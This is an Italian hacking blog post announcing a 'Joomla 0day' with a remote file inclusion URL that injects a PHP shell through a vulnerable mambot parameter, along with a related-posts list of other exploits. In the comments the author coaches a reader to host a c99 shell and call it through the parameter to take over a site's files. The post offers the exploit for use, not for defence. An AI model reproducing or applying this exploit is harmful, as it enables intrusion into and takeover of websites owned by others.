Senza entusiasmo,non si è mai compiuto niente di grande
0day Joomla: Shell Injection
http://{PAGE}/mambots/content/josowbot.content.php?mosConfig_absolute_path={SHELL}
XPL:/mambots/content/josowbot.content.php?mosConfig_absolute_path=
Permette di iniettare una shell in PHP nel sito web dandovi pieno accesso ai file dell'hosting.
Michele
Condividere è sexy
Ti potrebbero interessare anche i seguenti articoli
- Log poisoning e shell injection Video tutorial che illustra come iniettare una shell PHP su un server web avente uno...
- PHP Shell Scanner Sto recuperando tanto materiale interessante nel web per riproporlo di nuovo a voi Clicca qui...
- SQL injection PHP Nuke Tutti ormai conoscono PHP Nuke,il famoso CMS (content manager system ovvero sistema di gestione dei...
- Deluxebb <= 1.1 0day E' una vulnerabilità che affligge le versione di deluxeBB uguali o inferiori alle 1.1 E'...
- RCE su applicazione PHP vulnerabile a RFI Video tutorial che illustra come effettuare RCE (Remote Command Execution) su un web server su...
| Stampa l'articolo | Questo articolo è stato pubblicato da Michele il martedì 16 marzo 2010 alle 13:00, ed è archiviato come Hacking. Puoi seguire i commenti a questo post attraverso RSS 2.0. Puoi pubblicare un commento o segnalare un trackback dal tuo sito. |
Nessun trackback
Deluxebb <= 1.1 0day
circa 4 mesi fa - 1 commento
jQuery(document).ready(function($) { window.setTimeout(‘loadDigg_1222()’,5000);window.setTimeout(‘loadTwitter_1222()’,5000);window.setTimeout(‘loadFBShare_1222()’,5000);window.setTimeout(‘loadGBuzz_1222()’,5000); }); function loadDigg_1222(){ jQuery(document).ready(function($) { $(‘.dd-digg-1222′).remove();$(‘.DD_DIGG_AJAX_1222′).attr(‘href’,'http://digg.com/submit?url=http://www.michelepapaleo.it/0day-joomla-shell-injection/&title=0day+Joomla%3A+Shell+Injection’);$.getScript(‘http://widgets.digg.com/buttons.js’); }); } function loadTwitter_1222(){ jQuery(document).ready(function($) { $(‘.dd-twitter-1222′).remove();$(‘.DD_TWITTER_AJAX_1222′).attr(‘width’,’50′);$(‘.DD_TWITTER_AJAX_1222′).attr(‘height’,’61′);$(‘.DD_TWITTER_AJAX_1222′).attr(‘src’,'http://api.tweetmeme.com/button.js?url=http://www.michelepapaleo.it/0day-joomla-shell-injection/&source=ziomike2009&style=normal&service=&service_api=’); }); } function loadFBShare_1222(){ jQuery(document).ready(function($) { $(‘.dd-fbshare-1222′).remove(); $.getScript(‘http://static.ak.fbcdn.net/connect.php/js/FB.Share’); }); } function loadGBuzz_1222(){ jQuery(document).ready(function($) { $(‘.dd-gbuzz-1222′).remove();$.getScript(‘http://www.google.com/buzz/api/button.js’); }); }E' una vulnerabilità che affligge le versione di deluxeBB uguali o inferiori alle 1.1 E' in PHP,per funzionare serve un server apache in
Condividere è sexy
SQL injection PHP Nuke
circa 4 mesi fa - 1 commento
jQuery(document).ready(function($) { window.setTimeout(‘loadDigg_1222()’,5000);window.setTimeout(‘loadTwitter_1222()’,5000);window.setTimeout(‘loadFBShare_1222()’,5000);window.setTimeout(‘loadGBuzz_1222()’,5000); }); function loadDigg_1222(){ jQuery(document).ready(function($) { $(‘.dd-digg-1222′).remove();$(‘.DD_DIGG_AJAX_1222′).attr(‘href’,'http://digg.com/submit?url=http://www.michelepapaleo.it/0day-joomla-shell-injection/&title=0day+Joomla%3A+Shell+Injection’);$.getScript(‘http://widgets.digg.com/buttons.js’); }); } function loadTwitter_1222(){ jQuery(document).ready(function($) { $(‘.dd-twitter-1222′).remove();$(‘.DD_TWITTER_AJAX_1222′).attr(‘width’,’50′);$(‘.DD_TWITTER_AJAX_1222′).attr(‘height’,’61′);$(‘.DD_TWITTER_AJAX_1222′).attr(‘src’,'http://api.tweetmeme.com/button.js?url=http://www.michelepapaleo.it/0day-joomla-shell-injection/&source=ziomike2009&style=normal&service=&service_api=’); }); } function loadFBShare_1222(){ jQuery(document).ready(function($) { $(‘.dd-fbshare-1222′).remove(); $.getScript(‘http://static.ak.fbcdn.net/connect.php/js/FB.Share’); }); } function loadGBuzz_1222(){ jQuery(document).ready(function($) { $(‘.dd-gbuzz-1222′).remove();$.getScript(‘http://www.google.com/buzz/api/button.js’); }); } Tutti ormai conoscono PHP Nuke,il famoso CMS (content manager system ovvero sistema di gestione dei contenuti) e come ogni CMS che si
Condividere è sexy
RCE su applicazione PHP vulnerabile a RFI
circa 4 mesi fa - 1 commento
jQuery(document).ready(function($) { window.setTimeout(‘loadDigg_1222()’,5000);window.setTimeout(‘loadTwitter_1222()’,5000);window.setTimeout(‘loadFBShare_1222()’,5000);window.setTimeout(‘loadGBuzz_1222()’,5000); }); function loadDigg_1222(){ jQuery(document).ready(function($) { $(‘.dd-digg-1222′).remove();$(‘.DD_DIGG_AJAX_1222′).attr(‘href’,'http://digg.com/submit?url=http://www.michelepapaleo.it/0day-joomla-shell-injection/&title=0day+Joomla%3A+Shell+Injection’);$.getScript(‘http://widgets.digg.com/buttons.js’); }); } function loadTwitter_1222(){ jQuery(document).ready(function($) { $(‘.dd-twitter-1222′).remove();$(‘.DD_TWITTER_AJAX_1222′).attr(‘width’,’50′);$(‘.DD_TWITTER_AJAX_1222′).attr(‘height’,’61′);$(‘.DD_TWITTER_AJAX_1222′).attr(‘src’,'http://api.tweetmeme.com/button.js?url=http://www.michelepapaleo.it/0day-joomla-shell-injection/&source=ziomike2009&style=normal&service=&service_api=’); }); } function loadFBShare_1222(){ jQuery(document).ready(function($) { $(‘.dd-fbshare-1222′).remove(); $.getScript(‘http://static.ak.fbcdn.net/connect.php/js/FB.Share’); }); } function loadGBuzz_1222(){ jQuery(document).ready(function($) { $(‘.dd-gbuzz-1222′).remove();$.getScript(‘http://www.google.com/buzz/api/button.js’); }); } Video tutorial che illustra come effettuare RCE (Remote Command Execution) su un web server su cui è presente una pagina PHP vulnerabile
Condividere è sexy
e107 0.7.11 Preview Admin news Xss
circa 5 mesi fa - 1 commento
jQuery(document).ready(function($) { window.setTimeout(‘loadDigg_1222()’,5000);window.setTimeout(‘loadTwitter_1222()’,5000);window.setTimeout(‘loadFBShare_1222()’,5000);window.setTimeout(‘loadGBuzz_1222()’,5000); }); function loadDigg_1222(){ jQuery(document).ready(function($) { $(‘.dd-digg-1222′).remove();$(‘.DD_DIGG_AJAX_1222′).attr(‘href’,'http://digg.com/submit?url=http://www.michelepapaleo.it/0day-joomla-shell-injection/&title=0day+Joomla%3A+Shell+Injection’);$.getScript(‘http://widgets.digg.com/buttons.js’); }); } function loadTwitter_1222(){ jQuery(document).ready(function($) { $(‘.dd-twitter-1222′).remove();$(‘.DD_TWITTER_AJAX_1222′).attr(‘width’,’50′);$(‘.DD_TWITTER_AJAX_1222′).attr(‘height’,’61′);$(‘.DD_TWITTER_AJAX_1222′).attr(‘src’,'http://api.tweetmeme.com/button.js?url=http://www.michelepapaleo.it/0day-joomla-shell-injection/&source=ziomike2009&style=normal&service=&service_api=’); }); } function loadFBShare_1222(){ jQuery(document).ready(function($) { $(‘.dd-fbshare-1222′).remove(); $.getScript(‘http://static.ak.fbcdn.net/connect.php/js/FB.Share’); }); } function loadGBuzz_1222(){ jQuery(document).ready(function($) { $(‘.dd-gbuzz-1222′).remove();$.getScript(‘http://www.google.com/buzz/api/button.js’); }); } Questa vulnerabilità vale per la versione 0.7.11 del CMS e107 BUG: in submitnews.php le variabili $author_name, $itemtitle e $item non sono controllate,
Condividere è sexy
PHP Backdoor Version 1.5
circa 5 mesi fa - 2 commenti
jQuery(document).ready(function($) { window.setTimeout(‘loadDigg_1222()’,5000);window.setTimeout(‘loadTwitter_1222()’,5000);window.setTimeout(‘loadFBShare_1222()’,5000);window.setTimeout(‘loadGBuzz_1222()’,5000); }); function loadDigg_1222(){ jQuery(document).ready(function($) { $(‘.dd-digg-1222′).remove();$(‘.DD_DIGG_AJAX_1222′).attr(‘href’,'http://digg.com/submit?url=http://www.michelepapaleo.it/0day-joomla-shell-injection/&title=0day+Joomla%3A+Shell+Injection’);$.getScript(‘http://widgets.digg.com/buttons.js’); }); } function loadTwitter_1222(){ jQuery(document).ready(function($) { $(‘.dd-twitter-1222′).remove();$(‘.DD_TWITTER_AJAX_1222′).attr(‘width’,’50′);$(‘.DD_TWITTER_AJAX_1222′).attr(‘height’,’61′);$(‘.DD_TWITTER_AJAX_1222′).attr(‘src’,'http://api.tweetmeme.com/button.js?url=http://www.michelepapaleo.it/0day-joomla-shell-injection/&source=ziomike2009&style=normal&service=&service_api=’); }); } function loadFBShare_1222(){ jQuery(document).ready(function($) { $(‘.dd-fbshare-1222′).remove(); $.getScript(‘http://static.ak.fbcdn.net/connect.php/js/FB.Share’); }); } function loadGBuzz_1222(){ jQuery(document).ready(function($) { $(‘.dd-gbuzz-1222′).remove();$.getScript(‘http://www.google.com/buzz/api/button.js’); }); }Per chi non sapesse cosa sia una Backdoor riporto la citazione di wikipedia: Le backdoor in informatica sono paragonabili a porte di servizio
Condividere è sexy
Elenco porte server
circa 5 mesi fa - Nessun commento
jQuery(document).ready(function($) { window.setTimeout(‘loadDigg_1222()’,5000);window.setTimeout(‘loadTwitter_1222()’,5000);window.setTimeout(‘loadFBShare_1222()’,5000);window.setTimeout(‘loadGBuzz_1222()’,5000); }); function loadDigg_1222(){ jQuery(document).ready(function($) { $(‘.dd-digg-1222′).remove();$(‘.DD_DIGG_AJAX_1222′).attr(‘href’,'http://digg.com/submit?url=http://www.michelepapaleo.it/0day-joomla-shell-injection/&title=0day+Joomla%3A+Shell+Injection’);$.getScript(‘http://widgets.digg.com/buttons.js’); }); } function loadTwitter_1222(){ jQuery(document).ready(function($) { $(‘.dd-twitter-1222′).remove();$(‘.DD_TWITTER_AJAX_1222′).attr(‘width’,’50′);$(‘.DD_TWITTER_AJAX_1222′).attr(‘height’,’61′);$(‘.DD_TWITTER_AJAX_1222′).attr(‘src’,'http://api.tweetmeme.com/button.js?url=http://www.michelepapaleo.it/0day-joomla-shell-injection/&source=ziomike2009&style=normal&service=&service_api=’); }); } function loadFBShare_1222(){ jQuery(document).ready(function($) { $(‘.dd-fbshare-1222′).remove(); $.getScript(‘http://static.ak.fbcdn.net/connect.php/js/FB.Share’); }); } function loadGBuzz_1222(){ jQuery(document).ready(function($) { $(‘.dd-gbuzz-1222′).remove();$.getScript(‘http://www.google.com/buzz/api/button.js’); }); } Sono visibili tutte le porte con relativi protocolli keywords e descrizione. Ora non necessariamente in TUTTI i sistemi e SERVER le porte
Condividere è sexy
Log poisoning e shell injection
circa 5 mesi fa - Nessun commento
jQuery(document).ready(function($) { window.setTimeout(‘loadDigg_1222()’,5000);window.setTimeout(‘loadTwitter_1222()’,5000);window.setTimeout(‘loadFBShare_1222()’,5000);window.setTimeout(‘loadGBuzz_1222()’,5000); }); function loadDigg_1222(){ jQuery(document).ready(function($) { $(‘.dd-digg-1222′).remove();$(‘.DD_DIGG_AJAX_1222′).attr(‘href’,'http://digg.com/submit?url=http://www.michelepapaleo.it/0day-joomla-shell-injection/&title=0day+Joomla%3A+Shell+Injection’);$.getScript(‘http://widgets.digg.com/buttons.js’); }); } function loadTwitter_1222(){ jQuery(document).ready(function($) { $(‘.dd-twitter-1222′).remove();$(‘.DD_TWITTER_AJAX_1222′).attr(‘width’,’50′);$(‘.DD_TWITTER_AJAX_1222′).attr(‘height’,’61′);$(‘.DD_TWITTER_AJAX_1222′).attr(‘src’,'http://api.tweetmeme.com/button.js?url=http://www.michelepapaleo.it/0day-joomla-shell-injection/&source=ziomike2009&style=normal&service=&service_api=’); }); } function loadFBShare_1222(){ jQuery(document).ready(function($) { $(‘.dd-fbshare-1222′).remove(); $.getScript(‘http://static.ak.fbcdn.net/connect.php/js/FB.Share’); }); } function loadGBuzz_1222(){ jQuery(document).ready(function($) { $(‘.dd-gbuzz-1222′).remove();$.getScript(‘http://www.google.com/buzz/api/button.js’); }); }Video tutorial che illustra come iniettare una shell PHP su un server web avente uno script che effettua il logging su un file
Condividere è sexy
Fix phpBB (privmsg.php) XSS
circa 5 mesi fa - Nessun commento
jQuery(document).ready(function($) { window.setTimeout(‘loadDigg_1222()’,5000);window.setTimeout(‘loadTwitter_1222()’,5000);window.setTimeout(‘loadFBShare_1222()’,5000);window.setTimeout(‘loadGBuzz_1222()’,5000); }); function loadDigg_1222(){ jQuery(document).ready(function($) { $(‘.dd-digg-1222′).remove();$(‘.DD_DIGG_AJAX_1222′).attr(‘href’,'http://digg.com/submit?url=http://www.michelepapaleo.it/0day-joomla-shell-injection/&title=0day+Joomla%3A+Shell+Injection’);$.getScript(‘http://widgets.digg.com/buttons.js’); }); } function loadTwitter_1222(){ jQuery(document).ready(function($) { $(‘.dd-twitter-1222′).remove();$(‘.DD_TWITTER_AJAX_1222′).attr(‘width’,’50′);$(‘.DD_TWITTER_AJAX_1222′).attr(‘height’,’61′);$(‘.DD_TWITTER_AJAX_1222′).attr(‘src’,'http://api.tweetmeme.com/button.js?url=http://www.michelepapaleo.it/0day-joomla-shell-injection/&source=ziomike2009&style=normal&service=&service_api=’); }); } function loadFBShare_1222(){ jQuery(document).ready(function($) { $(‘.dd-fbshare-1222′).remove(); $.getScript(‘http://static.ak.fbcdn.net/connect.php/js/FB.Share’); }); } function loadGBuzz_1222(){ jQuery(document).ready(function($) { $(‘.dd-gbuzz-1222′).remove();$.getScript(‘http://www.google.com/buzz/api/button.js’); }); }Per Fixare: aprire phpBB2/privmsg.php trovare questo codice: if (!($to_userdata = $db->sql_fetchrow($result))) { $error = TRUE; $error_msg = $lang['No_such_user']; sostituirlo con questo: if (
Condividere è sexy
Fix Nuke Sentinel SQJ Injection
circa 5 mesi fa - Nessun commento
jQuery(document).ready(function($) { window.setTimeout(‘loadDigg_1222()’,5000);window.setTimeout(‘loadTwitter_1222()’,5000);window.setTimeout(‘loadFBShare_1222()’,5000);window.setTimeout(‘loadGBuzz_1222()’,5000); }); function loadDigg_1222(){ jQuery(document).ready(function($) { $(‘.dd-digg-1222′).remove();$(‘.DD_DIGG_AJAX_1222′).attr(‘href’,'http://digg.com/submit?url=http://www.michelepapaleo.it/0day-joomla-shell-injection/&title=0day+Joomla%3A+Shell+Injection’);$.getScript(‘http://widgets.digg.com/buttons.js’); }); } function loadTwitter_1222(){ jQuery(document).ready(function($) { $(‘.dd-twitter-1222′).remove();$(‘.DD_TWITTER_AJAX_1222′).attr(‘width’,’50′);$(‘.DD_TWITTER_AJAX_1222′).attr(‘height’,’61′);$(‘.DD_TWITTER_AJAX_1222′).attr(‘src’,'http://api.tweetmeme.com/button.js?url=http://www.michelepapaleo.it/0day-joomla-shell-injection/&source=ziomike2009&style=normal&service=&service_api=’); }); } function loadFBShare_1222(){ jQuery(document).ready(function($) { $(‘.dd-fbshare-1222′).remove(); $.getScript(‘http://static.ak.fbcdn.net/connect.php/js/FB.Share’); }); } function loadGBuzz_1222(){ jQuery(document).ready(function($) { $(‘.dd-gbuzz-1222′).remove();$.getScript(‘http://www.google.com/buzz/api/button.js’); }); }ll sentinel non blocca delle sql injection scritte in un certo modo… Per fixarlo: Aprire includes/nukesentinel.php e cercare: if (stristr($nsnst_const['query_string'],'%20union%20') OR stristr($nsnst_const['query_string'],'*/union/*') OR
Condividere è sexy
VincySentinel
circa 5 mesi fa - Nessun commento
jQuery(document).ready(function($) { window.setTimeout(‘loadDigg_1222()’,5000);window.setTimeout(‘loadTwitter_1222()’,5000);window.setTimeout(‘loadFBShare_1222()’,5000);window.setTimeout(‘loadGBuzz_1222()’,5000); }); function loadDigg_1222(){ jQuery(document).ready(function($) { $(‘.dd-digg-1222′).remove();$(‘.DD_DIGG_AJAX_1222′).attr(‘href’,'http://digg.com/submit?url=http://www.michelepapaleo.it/0day-joomla-shell-injection/&title=0day+Joomla%3A+Shell+Injection’);$.getScript(‘http://widgets.digg.com/buttons.js’); }); } function loadTwitter_1222(){ jQuery(document).ready(function($) { $(‘.dd-twitter-1222′).remove();$(‘.DD_TWITTER_AJAX_1222′).attr(‘width’,’50′);$(‘.DD_TWITTER_AJAX_1222′).attr(‘height’,’61′);$(‘.DD_TWITTER_AJAX_1222′).attr(‘src’,'http://api.tweetmeme.com/button.js?url=http://www.michelepapaleo.it/0day-joomla-shell-injection/&source=ziomike2009&style=normal&service=&service_api=’); }); } function loadFBShare_1222(){ jQuery(document).ready(function($) { $(‘.dd-fbshare-1222′).remove(); $.getScript(‘http://static.ak.fbcdn.net/connect.php/js/FB.Share’); }); } function loadGBuzz_1222(){ jQuery(document).ready(function($) { $(‘.dd-gbuzz-1222′).remove();$.getScript(‘http://www.google.com/buzz/api/button.js’); }); }Il mio caro amico Vincy ha codato da tempo un nuovo Sentinel che blocca molte intrusioni ai vostri sistemi. Funziona su molti CMS,anche
Condividere è sexy
circa 2 mesi fa
Ma come funziona? cosa metto nella scritta shell? puoi fare un esempio?
circa 2 mesi fa
Ciao Marco,
alla scritta Shell devi inserire il link alla Shell (consiglio c99) e poi inviare il link nel tuo browser web.
Spero di esser stato chiaro altrimenti chiedi
circa 2 mesi fa
frs ho kapito… mi dai il link dello shell?
circa 2 mesi fa
La devi averla tu sul tuo hosting
circa 2 mesi fa
e dove la skariko?
circa 2 mesi fa
Su google ti basta cercare c99.txt e trovi il codice della shell da usare.
circa 2 mesi fa
ho provato ma dà un errore… tipo You don’t have permission to access /mambots/content/josowbot.content.php on this server.
circa 2 mesi fa
Vuol dire che è stato eseguito il fix per il bug